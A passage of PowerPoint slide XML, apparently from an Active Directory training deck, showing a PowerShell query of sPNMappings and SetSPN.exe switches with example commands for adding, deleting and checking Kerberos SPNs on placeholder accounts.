                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=Windows NT,CN=Services,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CN=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Configuration,DC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>vm,DC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=net' -Properties </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sPNMappings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sPNMappings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -split ',' | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Measure-Object</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="369414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261335"/>
            <a:ext cx="7924800" cy="2723823"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SetSPN.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>L = List SPNs registered to a target account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A = add arbitrary SPN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>S = add arbitrary SPN after verifying no duplicates exist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>D = delete arbitrary SPN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Q = query for existence of SPN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>X = search for duplicate SPNs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>F = perform queries at the forest, rather than domain level.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes and Interactions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The easiest way to work with SPNs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="AutoShape 5"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="274692" y="4077072"/>
            <a:ext cx="8643998" cy="2044742"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 7097"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="002060"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1">
              <a:shade val="50000"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274692" y="4135088"/>
            <a:ext cx="1284270" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PS C:&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1416980" y="4150255"/>
            <a:ext cx="184731" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1274824" y="4105590"/>
            <a:ext cx="7643866" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>setspn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>modifiers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>switch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>] [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>accountname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>setspn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –a http/portal.contoso.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>myDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>myAppPoolAccount</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>setspn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –s http/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>portal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>myDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>myAppPoolAccount</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>setspn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –d http/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>oldportal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>myDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>myOldServer</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>setspn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –f –x –p</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279457" y="4455267"/>
            <a:ext cx="1284270" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PS C:&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279457" y="4754537"/>
            <a:ext cx="1284270" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PS C:&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1421745" y="4769704"/>
            <a:ext cx="184731" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="284222" y="5074716"/>
            <a:ext cx="1284270" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PS C:&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="288987" y="5366560"/>
            <a:ext cx="1284270" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PS C:&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
